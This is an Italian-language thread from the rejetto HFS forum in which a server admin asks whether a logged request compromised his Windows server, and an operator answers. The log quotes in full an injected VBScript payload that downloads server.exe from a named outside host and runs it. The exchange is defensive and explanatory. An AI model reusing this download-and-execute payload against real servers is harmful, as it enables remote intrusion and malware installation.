rejetto forum

Probabile tentativo di eseguire comandi da remoto

0 Members and 1 Guest are viewing this topic.

Offline _KrustY_

  • Occasional poster
  • *
    • Posts: 2
    • View Profile
BuonGiorno
uso da tempo HFS su un server dedicato con Windows server 2012
tengo sempre aggiornato HFS, ora ho la 2.3k
2 giorni fa ho trovato nel log questi comandi

Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe%22,0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

Ho cercato il file server.exe in c: ma non c'è e non è nemmeno aperto come processo
Vorrei capire se questo tentativo di esecuzione del file è andato a buon fine e se è possibile bloccare qualsiasi richiesta di esecuzione di script o comandi shell

Grazie


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
Certainly, this is an attempt to hack the server

the request included in the script come from china

Domain:       yamanbeisi.com
IP Address:       103.27.208.67
Region:       Chengdu (CN)

the file contains the following schema TR.Crypt.Xpack.srkhd

look at this report
http://r.virscan.org/report/eb5138fac75c231d89b69d93612310f2

the best thing to do is to have a good antivirus always updated, and to block the domain name of the link as well as the associated ip
« Last Edit: January 17, 2018, 07:04:29 PM by Mars »


Offline _KrustY_

  • Occasional poster
  • *
    • Posts: 2
    • View Profile
Ok Grazie Mars

Vorrei capire se c'è il modo di bloccare qualsiasi richiesta di esecuzione di script o comandi shell in HFS

Grazie
Ciaoo


Offline Mars

  • Operator
  • Tireless poster
  • *****
    • Posts: 2063
    • View Profile
tradotto con google tanslate:

hfs è teoricamente protetto per non eseguire comandi come la macro del modello {. ... .}, potrebbero esserci varianti che non sono mai state testate o segnalate per rejetto. Dovresti avere la riga di comando completa del tentativo fraudolento di analizzare gli effetti, se non hai trovato una traccia di un programma, è che probabilmente il tentativo è fallito.

cosa fare mentre si attende che rejetto diventi consapevole della propria avventura è registrare il server di hosting in una lista di ban, così come l'indirizzo ip corrispondente in un firewall